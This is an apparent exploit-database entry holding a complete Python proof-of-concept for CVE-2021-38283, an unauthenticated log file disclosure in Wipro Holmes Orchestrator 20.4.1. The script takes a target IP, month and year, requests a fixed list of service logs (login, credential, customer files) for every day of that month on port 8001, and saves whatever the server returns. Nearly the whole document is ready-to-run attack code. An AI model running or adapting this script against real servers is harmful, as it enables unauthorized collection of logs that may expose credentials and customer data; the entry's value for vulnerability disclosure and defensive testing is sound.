Wipro Holmes Orchestrator 20.4.1 - Log File Disclosure - 2021-38283

1. # Exploit Title: Wipro Holmes Orchestrator 20.4.1 - Log File Disclosure
2. # Date: 09/08/2021
3. # Exploit Author: Rizal Muhammed @ub3rsick
4. # Vendor Homepage: https://www.wipro.com/holmes/
5. # Version: Wipro Holmes Orchestrator v20.4.1
6. # Tested on: Windows
7. # CVE : CVE-2021-38283
8.  
9. import requests as rq
10. import argparse
11. import datetime
12. import os
13. from calendar import monthrange
14. from multiprocessing.dummy import Pool as ThreadPool
15. from functools import partial
16.  
17. # Change if running on different port
18. port = 8001
19. log_list = [
20.     "AlertService.txt", "ApprovalService.txt", "AuditService.txt", "CustomerController.txt",
21.     "CustomerDomainCredentialService.txt", "CustomerFile.zip", "CustomerService.txt",
22.     "DashboardController.txt", "DataParseService.txt", "DomainService.txt", "ExecutionService.txt",
23.     "ExternalAPIService.txt", "FilesController.txt", "FormService.txt", "InfrastructureService.txt",
24.     "ITSMConfigPrepService.txt", "LicenseService.txt", "LoginService.txt", "MailService.txt",
25.     "MasterdataController.txt", "NetworkService.txt", "OrchestrationPreparationService.txt",
26.     "ProblemInfrastructureService.txt", "ProcessExecutionService.txt", "ServiceRequestService.txt",
27.     "SolutionController.txt", "SolutionLiveService.txt", "SolutionService.txt", "StorageService.txt",
28.     "TaskService.txt", "TicketingService.txt", "UserController.txt", "UtilityService.txt"
29. ]
30.  
31. def check_month(val):
32.     ival = int(val)
33.     if ival > 0 and ival < 13:
34.         return ival
35.     else:
36.         raise argparse.ArgumentTypeError("%s is not a valid month" % val)
37.  
38. def check_year(val):
39.     iyear = int(val)
40.     if iyear >= 1960 and iyear <= datetime.date.today().year:
41.         return iyear
42.     else:
43.         raise argparse.ArgumentTypeError("%s is not a valid year" % val)
44.  
45. def do_request(target, date, log_file):
46.     log_url = f"http://{target}/log/{date}/{log_file}"
47.     log_name = f"{date}_{log_file}"
48.     print(f"[*] Requesting Log: /log/{date}/{log_file}")
49.     resp = rq.get(log_url)
50.     if resp.status_code == 200 and not "Wipro Ltd." in resp.text:
51.         print(f"[+] Success: {log_url}")
52.         with open(f"logs/{log_name}", 'w') as lf:
53.             lf.write(resp.text)
54.         print(f"[*] Log File Written to ./logs/{log_name}")
55.  
56. def main():
57.     parser = argparse.ArgumentParser(description="Wipro Holmes Orchestrator 20.4.1 Unauthenticated Log File Disclosure",
58.                                      epilog="Vulnerability Discovery, PoC Author - Rizal Muhammed @ub3sick")
59.     parser.add_argument("-t", "--target-ip", help="IP Address of the target server", required=True)
60.     parser.add_argument("-m", "--month", help="Month of the log, (1=JAN, 2=FEB etc.)", required=True, type=check_month)
61.     parser.add_argument("-y", "--year", help="Year of the log", required=True, type=check_year)
62.     args = parser.parse_args()
63.  
64.     ndays = monthrange(args.year, args.month)[1]
65.     date_list = [f"{datetime.date(args.year, args.month, day)}" for day in range(1, ndays + 1)]
66.     target = f"{args.target_ip}:{port}"
67.  
68.     # Create folder "logs" to save log files, if it does not exist
69.     if not os.path.exists("./logs"):
70.         os.makedirs("./logs")
71.  
72.     for log_date in date_list:
73.         for log_file in log_list:
74.             do_request(target, log_date, log_file)
75.  
76. if __name__ == "__main__":
77.     main()
78.